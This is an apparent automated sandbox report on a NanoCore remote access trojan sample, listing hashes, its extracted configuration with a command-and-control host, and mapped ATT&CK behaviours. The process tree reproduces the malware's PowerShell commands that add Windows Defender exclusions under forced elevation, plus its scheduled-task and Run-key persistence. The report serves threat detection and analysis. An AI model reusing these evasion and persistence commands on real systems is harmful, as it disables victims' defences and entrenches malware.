nanocore | 80518576d0012cbaafa633be79c472de9fb46c0484cd238c8d8cb0d7f2dac02d

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-10-2024 00:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe
Size

2.1MB
MD5

5f6b7ad587ec1fe9c1afdfb1bc12463a
SHA1

b53bc71f7e1bb23378c18856cc038c6522cd1441
SHA256

80518576d0012cbaafa633be79c472de9fb46c0484cd238c8d8cb0d7f2dac02d
SHA512

bf11b1199950cc9d3f7444e22050ab424add02b663cf7c034fb9c27ba0428ee4f4866d89081eea9103ffc9eec6ce0bb7c6a5cd926f2b9d6ed4a51288ff902b24
SSDEEP

24576:dYDqXSb84KRDMNR9r0hLxAnLGzOnqNDD+tJjEYGpUU3e4q+CjL71FL38D1PKMeY8:dYJr0G2xYGpUMqv38D1rUdFmH4

Score

10^/10

nanocore discovery evasion execution keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

pkaraven.ddns.net:8282

127.0.0.1:8282

Mutex

5d3aa83f-9e45-499f-aac7-e76ef2b005e8

Attributes

activate_away_mode
true
backup_connection_host
127.0.0.1
backup_dns_server
37.235.1.177
buffer_size
65535
build_time
2024-07-30T21:10:14.350969836Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
8282
default_group
ANNEX1
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
5d3aa83f-9e45-499f-aac7-e76ef2b005e8
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
pkaraven.ddns.net
primary_dns_server
37.235.1.174
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
396	powershell.exe
2672	powershell.exe
464	powershell.exe
4672	powershell.exe
396	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

988cd6cd69527c9a.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	988cd6cd69527c9a.exe

Drops startup file 1 IoCs

Processes:

2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\988cd6cd69527c9a.exe	2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe

Executes dropped EXE 2 IoCs

Processes:

988cd6cd69527c9a.exe988cd6cd69527c9a.exe

pid	Process
4712	988cd6cd69527c9a.exe
1168	988cd6cd69527c9a.exe

Unexpected DNS network traffic destination 6 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	37.235.1.174
Destination IP	37.235.1.177
Destination IP	37.235.1.174
Destination IP	37.235.1.174
Destination IP	37.235.1.177
Destination IP	37.235.1.177

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

988cd6cd69527c9a.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LAN Service = "C:\\Program Files (x86)\\LAN Service\\lansv.exe"	988cd6cd69527c9a.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

988cd6cd69527c9a.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	988cd6cd69527c9a.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

988cd6cd69527c9a.exe

description	pid	Process	procid_target
PID 4712 set thread context of 1168	4712	988cd6cd69527c9a.exe	108

Drops file in Program Files directory 2 IoCs

Processes:

988cd6cd69527c9a.exe

description	ioc	Process
File created	C:\Program Files (x86)\LAN Service\lansv.exe	988cd6cd69527c9a.exe
File opened for modification	C:\Program Files (x86)\LAN Service\lansv.exe	988cd6cd69527c9a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exeschtasks.exepowershell.exe988cd6cd69527c9a.exe2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exepowershell.exepowershell.exe988cd6cd69527c9a.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	988cd6cd69527c9a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	988cd6cd69527c9a.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
4804	schtasks.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

powershell.exepowershell.exe988cd6cd69527c9a.exepowershell.exepowershell.exe988cd6cd69527c9a.exe

pid	Process
396	powershell.exe
396	powershell.exe
2672	powershell.exe
2672	powershell.exe
4712	988cd6cd69527c9a.exe
464	powershell.exe
464	powershell.exe
4712	988cd6cd69527c9a.exe
4712	988cd6cd69527c9a.exe
4672	powershell.exe
4672	powershell.exe
464	powershell.exe
1168	988cd6cd69527c9a.exe
1168	988cd6cd69527c9a.exe
1168	988cd6cd69527c9a.exe
1168	988cd6cd69527c9a.exe
4672	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

988cd6cd69527c9a.exe

pid	Process
1168	988cd6cd69527c9a.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exe988cd6cd69527c9a.exepowershell.exepowershell.exe988cd6cd69527c9a.exe

description	pid	Process
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	4712	988cd6cd69527c9a.exe
Token: SeDebugPrivilege	464	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	1168	988cd6cd69527c9a.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exepowershell.exe988cd6cd69527c9a.exe

description	pid	Process	procid_target
PID 5060 wrote to memory of 396	5060	2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe	95
PID 5060 wrote to memory of 396	5060	2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe	95
PID 5060 wrote to memory of 396	5060	2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe	95
PID 396 wrote to memory of 2672	396	powershell.exe	97
PID 396 wrote to memory of 2672	396	powershell.exe	97
PID 396 wrote to memory of 2672	396	powershell.exe	97
PID 5060 wrote to memory of 4712	5060	2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe	99
PID 5060 wrote to memory of 4712	5060	2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe	99
PID 5060 wrote to memory of 4712	5060	2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe	99
PID 4712 wrote to memory of 464	4712	988cd6cd69527c9a.exe	102
PID 4712 wrote to memory of 464	4712	988cd6cd69527c9a.exe	102
PID 4712 wrote to memory of 464	4712	988cd6cd69527c9a.exe	102
PID 4712 wrote to memory of 4672	4712	988cd6cd69527c9a.exe	104
PID 4712 wrote to memory of 4672	4712	988cd6cd69527c9a.exe	104
PID 4712 wrote to memory of 4672	4712	988cd6cd69527c9a.exe	104
PID 4712 wrote to memory of 4804	4712	988cd6cd69527c9a.exe	106
PID 4712 wrote to memory of 4804	4712	988cd6cd69527c9a.exe	106
PID 4712 wrote to memory of 4804	4712	988cd6cd69527c9a.exe	106
PID 4712 wrote to memory of 1168	4712	988cd6cd69527c9a.exe	108
PID 4712 wrote to memory of 1168	4712	988cd6cd69527c9a.exe	108
PID 4712 wrote to memory of 1168	4712	988cd6cd69527c9a.exe	108
PID 4712 wrote to memory of 1168	4712	988cd6cd69527c9a.exe	108
PID 4712 wrote to memory of 1168	4712	988cd6cd69527c9a.exe	108
PID 4712 wrote to memory of 1168	4712	988cd6cd69527c9a.exe	108
PID 4712 wrote to memory of 1168	4712	988cd6cd69527c9a.exe	108
PID 4712 wrote to memory of 1168	4712	988cd6cd69527c9a.exe	108

C:\Users\Admin\AppData\Local\Temp\2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-25_5f6b7ad587ec1fe9c1afdfb1bc12463a_snatch.exe"
1⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5060
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command " do { $process = Start-Process powershell -ArgumentList '-Command Add-MpPreference -ExclusionPath \"C:\Users\"' -Verb runas -PassThru -WindowStyle Hidden -Wait -ErrorAction SilentlyContinue } while ($null -eq $process) "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\Users"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2672
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\988cd6cd69527c9a.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\988cd6cd69527c9a.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\988cd6cd69527c9a.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:464
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\FhRoTtY.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4672
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FhRoTtY" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFEF1.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4804
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\988cd6cd69527c9a.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\988cd6cd69527c9a.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:1168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
cb80edae6a174c3f8cca6e2e8fa21776

SHA1
ed846a79f0206057f409372a3e3509b4754ce6c4

SHA256
6b57b64cb1388eb1f5abf4e7cda5d399092c4304c60354b7a1d03649eacb7a98

SHA512
ec9bcfd95f855cfc0b7efef0738e95dd29ff1f5bf6b1376594231079889d4aaec1ca28d80990c49c3b529ab0748c3dce32d2643a76acc79e1d90e57a5ee7e36f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
3c57204240f86683c7cc4c91d13060aa

SHA1
95cacc30f5b4687132ef4378f15c4527b6f19f9d

SHA256
88cb4ace79d0fcbcbd9d35a1d3c54cdea07a5dd113ad461ca32be5f59b08001f

SHA512
ccad1dab6ba2f5aed0c75041a6ae2ee78e80a545d09c922f6f04f5936e57caf8aa990735b29824740acff2149707d7b467216b2324e76c1a82222380e954a21e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1pwudr3p.vwt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpFEF1.tmp

Filesize
1KB

MD5
13306dea59d97d99a72e7237b0b9d003

SHA1
81b608990879c241154cc89a839d641e61441ac6

SHA256
36ff6a344eafd5233fc9cfd214a464b33fd0345e5563a027c49328cc32180b30

SHA512
3a0b3d1b44b55a07744a68d9ca4507ff891121bab15c72795973a86d0ad1c2b31b71aedfc321ba02f3d70034fc8c0c5ec1cecf2ccd606761a5c416ad0711f3f9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\988cd6cd69527c9a.exe

Filesize
626KB

MD5
24c2f611285e2c29daeffd1181ff3953

SHA1
ba06d339dde1450b93767d414c325a69bee89155

SHA256
dd5a5fb1f821117c4d9c324fabb8454614a44b78f8ece89ff22ae90b8c9f3c8a

SHA512
6ed857ae392d1a33c69906b4d62750d9bbd1349de231a666afbc4ea74ba25c8955517a8e0a2e6e2d9f95bb3f06d5adbf3b1db3df0b0fdc44ccae094a8bde21c1

Download Submit
memory/396-23-0x0000000008200000-0x00000000087A4000-memory.dmp

Filesize
5.6MB

Download
memory/396-54-0x00000000747BE000-0x00000000747BF000-memory.dmp

Filesize
4KB

Download
memory/396-9-0x00000000062A0000-0x0000000006306000-memory.dmp

Filesize
408KB

Download
memory/396-17-0x0000000006310000-0x0000000006664000-memory.dmp

Filesize
3.3MB

Download
memory/396-18-0x00000000068F0000-0x000000000690E000-memory.dmp

Filesize
120KB

Download
memory/396-19-0x0000000006930000-0x000000000697C000-memory.dmp

Filesize
304KB

Download
memory/396-20-0x0000000007BB0000-0x0000000007C46000-memory.dmp

Filesize
600KB

Download
memory/396-21-0x0000000006E10000-0x0000000006E2A000-memory.dmp

Filesize
104KB

Download
memory/396-22-0x0000000006E80000-0x0000000006EA2000-memory.dmp

Filesize
136KB

Download
memory/396-0-0x00000000747BE000-0x00000000747BF000-memory.dmp

Filesize
4KB

Download
memory/396-1-0x0000000005370000-0x00000000053A6000-memory.dmp

Filesize
216KB

Download
memory/396-2-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/396-78-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/396-3-0x0000000005A90000-0x00000000060B8000-memory.dmp

Filesize
6.2MB

Download
memory/396-4-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/396-74-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/396-6-0x0000000006230000-0x0000000006296000-memory.dmp

Filesize
408KB

Download
memory/396-5-0x0000000005A30000-0x0000000005A52000-memory.dmp

Filesize
136KB

Download
memory/396-55-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/464-125-0x0000000007910000-0x00000000079B3000-memory.dmp

Filesize
652KB

Download
memory/464-137-0x0000000007C80000-0x0000000007C94000-memory.dmp

Filesize
80KB

Download
memory/464-115-0x0000000071890000-0x00000000718DC000-memory.dmp

Filesize
304KB

Download
memory/464-114-0x0000000006810000-0x000000000685C000-memory.dmp

Filesize
304KB

Download
memory/464-136-0x0000000007C40000-0x0000000007C51000-memory.dmp

Filesize
68KB

Download
memory/1168-95-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1168-113-0x0000000005C20000-0x0000000005C2A000-memory.dmp

Filesize
40KB

Download
memory/1168-112-0x0000000005BF0000-0x0000000005C0E000-memory.dmp

Filesize
120KB

Download
memory/1168-111-0x00000000050F0000-0x00000000050FA000-memory.dmp

Filesize
40KB

Download
memory/2672-36-0x00000000079C0000-0x00000000079F2000-memory.dmp

Filesize
200KB

Download
memory/2672-73-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/2672-24-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/2672-66-0x0000000007D60000-0x0000000007D6E000-memory.dmp

Filesize
56KB

Download
memory/2672-67-0x0000000007D70000-0x0000000007D84000-memory.dmp

Filesize
80KB

Download
memory/2672-68-0x0000000007E70000-0x0000000007E8A000-memory.dmp

Filesize
104KB

Download
memory/2672-53-0x0000000007B80000-0x0000000007B8A000-memory.dmp

Filesize
40KB

Download
memory/2672-49-0x0000000007A00000-0x0000000007AA3000-memory.dmp

Filesize
652KB

Download
memory/2672-48-0x0000000007980000-0x000000000799E000-memory.dmp

Filesize
120KB

Download
memory/2672-50-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/2672-52-0x0000000008150000-0x00000000087CA000-memory.dmp

Filesize
6.5MB

Download
memory/2672-37-0x00000000705E0000-0x000000007062C000-memory.dmp

Filesize
304KB

Download
memory/2672-26-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/2672-51-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/2672-47-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/2672-25-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/2672-69-0x0000000007E50000-0x0000000007E58000-memory.dmp

Filesize
32KB

Download
memory/2672-56-0x0000000007D30000-0x0000000007D41000-memory.dmp

Filesize
68KB

Download
memory/4672-126-0x0000000071890000-0x00000000718DC000-memory.dmp

Filesize
304KB

Download
memory/4712-70-0x0000000006160000-0x0000000006172000-memory.dmp

Filesize
72KB

Download
memory/4712-98-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/4712-80-0x0000000006DB0000-0x0000000006E2A000-memory.dmp

Filesize
488KB

Download
memory/4712-79-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/4712-62-0x00000000747B0000-0x0000000074F60000-memory.dmp

Filesize
7.7MB

Download
memory/4712-64-0x0000000005930000-0x000000000593A000-memory.dmp

Filesize
40KB

Download
memory/4712-61-0x0000000000BE0000-0x0000000000C80000-memory.dmp

Filesize
640KB

Download
memory/4712-63-0x00000000054C0000-0x0000000005552000-memory.dmp

Filesize
584KB

Download
memory/4712-65-0x0000000006170000-0x000000000620C000-memory.dmp

Filesize
624KB

Download